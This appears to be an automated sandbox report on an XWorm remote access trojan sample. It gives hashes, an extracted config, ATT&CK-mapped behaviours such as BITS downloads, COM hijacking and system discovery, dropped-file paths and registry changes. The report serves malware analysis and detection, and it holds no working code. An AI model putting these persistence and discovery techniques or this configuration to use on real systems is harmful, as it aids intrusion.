xworm | 3f5996cd1014590af1a91a9b3c711cdefaabcb93e8b7399ebb801cc7f7cee762

Analysis

max time kernel
516s
max time network
864s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08/03/2025, 16:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.html
Size

3KB
MD5

8f42ccb443b9a6b53c6dc09a7eb26775
SHA1

2349df6e48fcba4e6b8994403d01f3f02899e200
SHA256

3f5996cd1014590af1a91a9b3c711cdefaabcb93e8b7399ebb801cc7f7cee762
SHA512

2621d678cf76c61e1c800e3b03706423840d6a93f22b7945364a43c441b43fe3a2ab34a040102fa36c082bc7730395fdef2dc5db2ebae5efa844ffa89ebe77fa

Score

10^/10

xworm discovery dropper persistence privilege_escalation rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:7000

Attributes

Install_directory
%AppData%
install_file
Vlc Runtime.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2176-2572-0x0000000000D40000-0x0000000000D5C000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2476	bitsadmin.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
205	2624	chrome.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
1304	7z2409-x64.exe
1440	7zFM.exe
900	Xworm V5.6.exe
2188	7z2409-x64.exe
2720	Xworm V5.6.exe
2176	VLC Runtime.exe
3068	7zFM.exe
628	server.exe
2220	SERVER.EXE
2700	Win32.dII
852	Win32.dII
1056	Win32.dII
1764	Win32.dII
3004	Win32.dII
1408	Win32.dII
2884	Win32.dII
1060	Win32.dII
768	Win32.dII
2868	Win32.dII
564	Win32.dII
1352	Win32.dII
1164	Win32.dII
2216	Win32.dII
1600	Win32.dII
1604	Win32.dII
1292	Win32.dII
696	Win32.dII
2820	Win32.dII
896	Win32.dII
2176	Win32.dII
2964	Win32.dII
1780	Win32.dII
2564	Win32.dII
2524	Win32.dII
2312	Win32.dII
1680	Win32.dII
2084	Win32.dII
1784	Win32.dII
2192	Win32.dII
2344	Win32.dII
1284	Win32.dII
2112	Win32.dII
1156	Win32.dII
3052	Win32.dII
2092	Win32.dII
572	Win32.dII
3040	Win32.dII
1096	Win32.dII
2924	Win32.dII
2600	Win32.dII
2492	Win32.dII
2432	Win32.dII
2648	Win32.dII
1848	Win32.dII
2992	Win32.dII
540	Win32.dII
1860	Win32.dII
2612	Win32.dII
2204	Win32.dII
2984	Win32.dII
1808	Win32.dII
1916	Win32.dII
1328	Win32.dII
1044	Win32.dII

Loads dropped DLL 64 IoCs

pid	Process
1304	7z2409-x64.exe
1304	7z2409-x64.exe
1304	7z2409-x64.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
1440	7zFM.exe
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
3068	7zFM.exe
2220	SERVER.EXE
2220	SERVER.EXE
2700	Win32.dII

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 48 IoCs

Web Service

T1102

flow	ioc
435	camo.githubusercontent.com
438	camo.githubusercontent.com
75	camo.githubusercontent.com
109	camo.githubusercontent.com
372	raw.githubusercontent.com
439	camo.githubusercontent.com
448	camo.githubusercontent.com
479	raw.githubusercontent.com
369	raw.githubusercontent.com
371	raw.githubusercontent.com
169	raw.githubusercontent.com
268	camo.githubusercontent.com
283	camo.githubusercontent.com
302	raw.githubusercontent.com
363	raw.githubusercontent.com
408	camo.githubusercontent.com
162	raw.githubusercontent.com
170	raw.githubusercontent.com
249	camo.githubusercontent.com
424	camo.githubusercontent.com
425	camo.githubusercontent.com
436	camo.githubusercontent.com
449	camo.githubusercontent.com
138	raw.githubusercontent.com
147	raw.githubusercontent.com
297	raw.githubusercontent.com
362	raw.githubusercontent.com
422	camo.githubusercontent.com
447	camo.githubusercontent.com
476	raw.githubusercontent.com
74	camo.githubusercontent.com
168	raw.githubusercontent.com
301	raw.githubusercontent.com
407	camo.githubusercontent.com
409	camo.githubusercontent.com
475	raw.githubusercontent.com
135	raw.githubusercontent.com
165	raw.githubusercontent.com
298	raw.githubusercontent.com
359	raw.githubusercontent.com
406	camo.githubusercontent.com
450	camo.githubusercontent.com
478	raw.githubusercontent.com
134	raw.githubusercontent.com
145	raw.githubusercontent.com
358	raw.githubusercontent.com
368	raw.githubusercontent.com
423	camo.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
219	ip-api.com

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	SERVER.EXE
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII
File created	C:\Windows\SysWOW64\Win32.dII	Win32.dII

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\tk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku-ckb.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lij.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\en.ttt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ja.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pa-in.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	7z2409-x64.exe
File created	C:\Program Files\7-Zip\7-zip.dll	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sa.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\es.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	7z2409-x64.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SERVER.EXE	server.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SERVER.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Win32.dII

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Xworm V5.6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Xworm V5.6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Xworm V5.6.exe

Modifies Internet Explorer settings 1 TTPs 53 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLs\url1 = "http://niggafart.com/"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLsTime	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLs\url4 = "https://signin.ebay.com/ws/ebayisapi.dll"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url5 = 0000000000000000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c84c6d3b2b5dd148a097aac550ad8cf00000000002000000000010660000000100002000000064c17bceab6ccc3069cbecbf63c1a61415b91653e4430aa19a25c2204ba94e63000000000e80000000020000200000003476fb8cbecbae89ed35935a0b7382b59c59b3ce12aa1f2de2f871c0f5d9356790000000f5ea01fc93c8631bfd4c36d287f1797069326fcf3576f2ea615285e415488d849406f4e5d37ba3c6ca3475fd856c7b3b40036e0b8af91cf998986482632903834aede2997439b17f1f9dfef55e96f648ccb6749a18d2f75f30ffef004e990bc056fd7f354c8120211f25e1f4d586e0f39ba6633f71fcf707c6d6c05209a00d0285c93efb2a9ab9a36c2902404ce2bfc14000000052fdbb19947b2db1515fcbd80c507b884d8095a4d40b20ef1d498d85236611a927257e78acee99663910196eebf8e2606ad9c391441a1164ec24a06a70a44ac0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{72A124F1-FC3E-11EF-B432-C6DA928D33CD} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLs	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLs\url2 = "https://www.facebook.com/"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url2 = 0000000000000000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url4 = 0000000000000000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0f62a3b4b90db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLs\url5 = "https://login.live.com/"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "447614929"	iexplore.exe
